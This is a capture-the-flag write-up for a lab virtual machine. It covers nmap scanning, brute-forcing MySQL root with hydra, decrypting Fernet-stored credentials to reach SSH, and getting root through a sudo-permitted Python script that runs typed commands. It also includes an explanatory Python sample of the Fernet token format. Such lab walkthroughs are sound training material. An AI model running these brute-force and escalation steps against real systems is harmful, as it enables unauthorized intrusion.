Host discovery

sudo nmap -sn 192.168.162.0/24

Port scan

sudo nmap --min-rate 10000 -p- 192.168.162.144
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-05 21:04 CST
Nmap scan report for 192.168.162.144
Host is up (0.00079s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
1337/tcp open waste
3306/tcp open mysql
MAC Address: 00:0C:29:7C:45:00 (VMware)

sudo nmap -sT -sV -sC -O -p1337,3306 192.168.162.144
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-05 21:04 CST
Nmap scan report for 192.168.162.144
Host is up (0.00043s latency).

PORT STATE SERVICE VERSION
1337/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 f7:af:6c:d1:26:94:dc:e5:1a:22:1a:64:4e:1c:34:a9 (RSA)
| 256 46:d2:8d:bd:2f:9e:af:ce:e2:45:5c:a6:12:c0:d9:19 (ECDSA)
|_ 256 8d:11:ed:ff:7d:c5:a7:24:99:22:7f:ce:29:88:b2:4a (ED25519)
3306/tcp open mysql MySQL 5.5.5-10.3.23-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.23-MariaDB-0+deb10u1
| Thread ID: 39
| Capabilities flags: 63486
| Some Capabilities: SupportsLoadDataLocal, Speaks41ProtocolOld, IgnoreSigpipes, SupportsTransactions, Support41Auth, IgnoreSpaceBeforeParenthesis, InteractiveClient, Speaks41ProtocolNew, ODBCClient, FoundRows, LongColumnFlag, DontAllowDatabaseTableColumn, SupportsCompression, ConnectWithDatabase, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: -Jmd0avQo[[9G;1!S_e[
|_ Auth Plugin Name: mysql_native_password
MAC Address: 00:0C:29:7C:45:00 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Getshell

Only two ports are open: one SSH and one MySQL.

searchsploit mysql 5.5

Tried looking for MySQL exploits, but the ones that exist all seem to be privilege escalation bugs, and we don't have any access yet.

Compared with SSH, I'd rather brute-force MySQL.

hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.162.144 -t 4 mysql

This yields the password prettywoman.

mysql -h 192.168.162.144 -uroot -p

Connect to the database remotely.

show databases;
use data;

There are four databases; the one called "data" is the interesting one.

show tables;

It contains a table called fernet.

select * from fernet;

It has two columns, cred and keyy, and the data in them doesn't look readable as-is. A search for "fernet" shows it is a symmetric encryption scheme, and it takes exactly a cred (the token) and a key.

Just run it through the site https://asecuritysite.com/tokens/ferdecode

Decrypted result: lucy:wJ9`”Lemdv9[FEw-
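Fernet's token layout, as an added example that is not part of the original post: it splits a token into its fields and checks the HMAC-SHA256 with the signing half of the key using only the Python standard library. The key, IV and payload bytes are constructed placeholders (the payload is not real AES output), and decrypting the payload, which needs a third-party library such as `cryptography`, is left out; the point is that the key sitting in the same table as the token (the keyy column here) makes the encryption meaningless.

```python
import base64
import hashlib
import hmac
import struct
# Fernet token layout (per the Fernet spec), all inside one base64url string:
#   0x80 | timestamp (8 bytes, big-endian seconds) | IV (16) | AES-128-CBC ciphertext | HMAC-SHA256 (32)
# The base64url key decodes to 32 bytes: signing key (first 16) || encryption key (last 16).
# Constructed placeholder key and payload bytes; the "ciphertext" is not real AES output.
KEY_B64 = base64.urlsafe_b64encode(bytes(range(32))).decode()
FAKE_CIPHERTEXT = b"\xaa" * 32          # constructed, two 16-byte CBC blocks
FAKE_IV = b"\x01" * 16                  # constructed
FAKE_TS = 1693918800                    # constructed timestamp
def split_key(key_b64):
    """Return (signing_key, encryption_key) from a base64url Fernet key."""
    raw = base64.urlsafe_b64decode(key_b64)
    if len(raw) != 32:
        raise ValueError("Fernet key must decode to 32 bytes")
    return raw[:16], raw[16:]

def build_token(ciphertext, key_b64, timestamp, iv):
    """Assemble and sign a token (used here only to produce sample input)."""
    signing_key, _ = split_key(key_b64)
    body = b"\x80" + struct.pack(">Q", timestamp) + iv + ciphertext
    tag = hmac.new(signing_key, body, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(body + tag).decode()

def parse_token(token_b64):
    """Split a token into its fields without trusting it yet."""
    raw = base64.urlsafe_b64decode(token_b64)
    if len(raw) < 1 + 8 + 16 + 32 or raw[0] != 0x80:
        raise ValueError("not a Fernet version-0x80 token")
    body, tag = raw[:-32], raw[-32:]
    (ts,) = struct.unpack(">Q", body[1:9])
    return {"timestamp": ts, "iv": body[9:25], "ciphertext": body[25:],
            "hmac": tag, "signed": body}

def verify_token(token_b64, key_b64):
    """True only if the HMAC matches; whoever holds the key can also decrypt."""
    signing_key, _ = split_key(key_b64)
    fields = parse_token(token_b64)
    expected = hmac.new(signing_key, fields["signed"], hashlib.sha256).digest()
    return hmac.compare_digest(expected, fields["hmac"])

def flip_ciphertext_byte(token_b64):
    """Return the same token with one ciphertext byte changed (for the check)."""
    raw = bytearray(base64.urlsafe_b64decode(token_b64))
    raw[25] ^= 0x01                     # first byte after version+timestamp+IV
    return base64.urlsafe_b64encode(bytes(raw)).decode()

SAMPLE_TOKEN = build_token(FAKE_CIPHERTEXT, KEY_B64, FAKE_TS, FAKE_IV)
```

A token whose ciphertext has been altered fails the HMAC check, so a real Fernet decoder refuses it before touching AES.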

ssh -p 1337 lucy@192.168.162.144

Connected successfully.

Privilege escalation

sudo -l shows we can run a Python script with sudo; reading the script, it executes the command we type in. That makes this easy.

sudo /usr/bin/python2 /opt/exp.py

Then enter

import os;os.system('/bin/bash')

Privilege escalation successful.

Closing thoughts

A fairly easy box; the only new thing I picked up was Fernet symmetric encryption.